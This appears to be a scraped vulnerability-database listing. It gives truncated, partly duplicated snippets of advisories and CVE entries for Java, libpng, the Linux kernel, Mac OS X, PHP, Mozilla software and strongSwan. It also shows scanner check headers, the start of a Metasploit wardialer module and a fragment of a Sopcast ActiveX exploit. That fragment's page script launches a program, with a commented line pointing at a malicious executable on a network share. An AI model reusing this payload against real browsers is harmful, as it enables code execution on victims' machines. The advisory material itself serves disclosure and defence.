OpenJDK remote LDAP Denial-Of-Service (6717680)

LdapCtx in the LDAP service in Java SE Development Kit JDK and Java Runtime Environment JRE 5.0 Update 17 and earlier; 6 Update 12 and earlier; SDK and JRE 1.3.124 and earlier; and 1.4.219 and earlier does not close the connection when initialization fails, which allows remote attackers to cause ...

Ubuntu USN-730-1 (libpng)

The remote host is missing an update to libpng announced via advisory USN-730-1. OpenVAS Vulnerability Test $Id: ubuntu7301.nasl 7969 2017-12-01 09:23:16Z santu $ $Id: ubuntu7301.nasl 7969 2017-12-01 09:23:16Z santu $ Description: Auto-generated from advisory USN-730-1 libpng Authors: Thomas Rein...

Ubuntu: Security Advisory (USN-730-1)

The remote host is missing an update for the SPDX-FileCopyrightText: 2009 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

Sopcast Sopcore Active-X Code Execution

window.onload=function SopPlayer.InitPlayer; //SopPlayer.SetExternalPlayer"\\192.168.0.1\c$\PATH\TO\MALICIOUSPROGRAM.EXE"; SopPlayer.SetExternalPlayer"c:\WINDOWS\system32\calc.exe"; SopPlayer.SetSopAddress"sop://broker.sopcast.com:3912/6002"; //A LIVE CHANNEL...

Linux Kernel 2.6.x - sock.c SO_BSDCOMPAT Option Information Disclosure

Linux Kernel 2.6.x - sock.c SOBSDCOMPAT Option Information Disclosure / source: https://www.securityfocus.com/bid/33846/info The Linux Kernel is prone to an information-disclosure vulnerability because it fails to properly initialize certain memory before using using it in a user-accessible...

Linux Kernel 2.6.x - 'sock.c' SO_BSDCOMPAT Option Information Disclosure

/ source: https://www.securityfocus.com/bid/33846/info The Linux Kernel is prone to an information-disclosure vulnerability because it fails to properly initialize certain memory before using using it in a user-accessible operation. Successful exploits will allow attackers to view portions of...

Design/Logic Flaw

The Remote Apple Events server in Apple Mac OS X 10.4.11 and 10.5.6 does not properly initialize a buffer, which allows remote attackers to read portions of memory...

CVE-2009-0018

CVE-2009-0018 affects Apple Mac OS X 10.4.11 and 10.5.6 via the Remote Apple Events server. The vulnerability stems from improper initialization of a buffer, enabling remote attackers to read portions of memory over the network. The NVD entry assigns a CVSSv2 base score of 7.8 (HIGH) with network...

Wardialer

Scan for dial-up systems that are connected to modems and answer telephony indials. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'zlib' Extend Object class to include savetofile and loadfromfile methods cla...

Design/Logic Flaw

PHP 5 before 5.2.7 does not properly initialize the pageuid and pagegid global variables for use by the SAPI phpgetuid function, which allows context-dependent attackers to bypass safemode restrictions via variable settings that are intended to be restricted to root, as demonstrated by a setting ...

CVE-2008-5624

CVE-2008-5624 affects PHP 5 before 5.2.7 where page_uid/page_gid globals were not properly initialized for php_getuid, enabling context-dependent attackers to bypass safe_mode via error_log settings. The public record in the initial description confirms the vulnerability and its impact on permiss...

CVE-2008-5624

PHP 5 before 5.2.7 does not properly initialize the pageuid and pagegid global variables for use by the SAPI phpgetuid function, which allows context-dependent attackers to bypass safemode restrictions via variable settings that are intended to be restricted to root, as demonstrated by a setting ...

CVE-2008-5624

PHP 5 before 5.2.7 does not properly initialize the pageuid and pagegid global variables for use by the SAPI phpgetuid function, which allows context-dependent attackers to bypass safemode restrictions via variable settings that are intended to be restricted to root, as demonstrated by a setting ...

PHP 5 < 5.2.7 Multiple Vulnerabilities

According to its banner, the version of PHP installed on the remote host is prior to 5.2.7. It is, therefore, affected by multiple vulnerabilities : - There is a buffer overflow flaw in the bundled PCRE library that allows a denial of service attack. CVE-2008-2371 - Multiple directory traversal...

openSUSE 10 Security Update : seamonkey (seamonkey-5815)

This update brings the Mozilla SeaMonkey browser to version 1.1.13. It fixes following security issues : CVE-2008-0017 / MFSA 2008-54 : The http-index-format MIME type parser nsDirIndexParser in Firefox 3.x before 3.0.4, Firefox 2.x before 2.0.0.18, and SeaMonkey 1.x before 1.1.13 does not check...

Mozilla crash and remote code execution in nsFrameManager

nsFrameManager in Firefox 3.x before 3.0.4, Firefox 2.x before 2.0.0.18, Thunderbird 2.x before 2.0.0.18, and SeaMonkey 1.x before 1.1.13 allows remote attackers to cause a denial of service crash and possibly execute arbitrary code by modifying properties of a file input element while it is stil...

Mozilla crash and remote code execution in nsFrameManager

nsFrameManager in Firefox 3.x before 3.0.4, Firefox 2.x before 2.0.0.18, Thunderbird 2.x before 2.0.0.18, and SeaMonkey 1.x before 1.1.13 allows remote attackers to cause a denial of service crash and possibly execute arbitrary code by modifying properties of a file input element while it is stil...

Analysis of a php exploit code-exploit warning-the black bar safety net

A few days ago to see a period of interesting code, records. First introduced to the php in a famous function pregreplace, which prototype is: mixed pregreplace mixed pattern, mixed replacement, mixed subject , int limit This function is an interesting place to be: as long as the first parameter...

DEBIAN-CVE-2008-4551

strongSwan 4.2.6 and earlier allows remote attackers to cause a denial of service daemon crash via an IKESAINIT message with a large number of NULL values in a Key Exchange payload, which triggers a NULL pointer dereference for the return value of the mpzexport function in the GNU Multiprecision...

Gentoo Security Advisory GLSA 200603-15 (crypt-cbc)

The remote host is missing updates announced in advisory GLSA 200603-15. SPDX-FileCopyrightText: 2008 E-Soft Inc. Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...